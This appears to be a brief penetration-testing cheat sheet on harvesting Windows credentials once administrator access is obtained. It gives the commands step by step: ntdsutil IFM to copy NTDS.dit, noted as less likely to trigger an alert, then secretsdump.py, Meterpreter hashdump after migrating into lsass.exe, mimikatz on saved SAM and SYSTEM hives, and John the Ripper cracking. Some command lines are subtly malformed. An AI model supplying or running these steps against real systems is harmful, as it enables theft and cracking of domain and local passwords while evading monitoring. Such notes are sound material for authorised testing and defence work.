*After obtaining Admin access*
The tool of choice is built into Windows. It is an active directory domain services management tool called ntdsutil. This is designed to managed AD data.
To gather NTDS.dit and system registered hive data, run the following
ntdsutil
activate instance ntds (this will generate a backup of the C:\ntds directory)
ifm
This is less likely to trigger an alert
After retrieving this data, it will need to be decrypted. A tool that can be used for this process is called secretsdump.py (https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)
Command: secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL
Obtaining Windows 10 password hashes
There are two options to obtaining the local hashes from a Windows box
- Password hashes from memory using meterpreter hashdump command
- Mimikatz
Hashdump
Hashdump will fail with the error priv_passwd_get_sam_hashes error
To work around this problem, we just have to move to a different process. Change from the current process to Lsass.exe
Newer shells you can combine the PS and migrate steps in the following command migrate -N lsass.exe
if successful, rerun hashdump
Mimikatz
retrieve the contents of HKLM\sam and HKLM\system
Then make them available to mimikatz
reg save hklm\sam sam.hiv $$ reg save hklm\system system.hiv
c:\tools\mimikatz\x64\mimikatz.exe “lsadump::sam /sam:sam.hiv
John the Ripper
Cracking windows passwords with John
You will need to give John the text-based output from Meterpreter’s hashdump module, mimikatz, or secretsdump.py
Merging the etc/passwd and etc/shadow files
unshadow /etc/passwd etc/shadow > combined
For windows NT targets, you must specify –format=NT
For LANMAN targetsm you must specify –format=LANMAN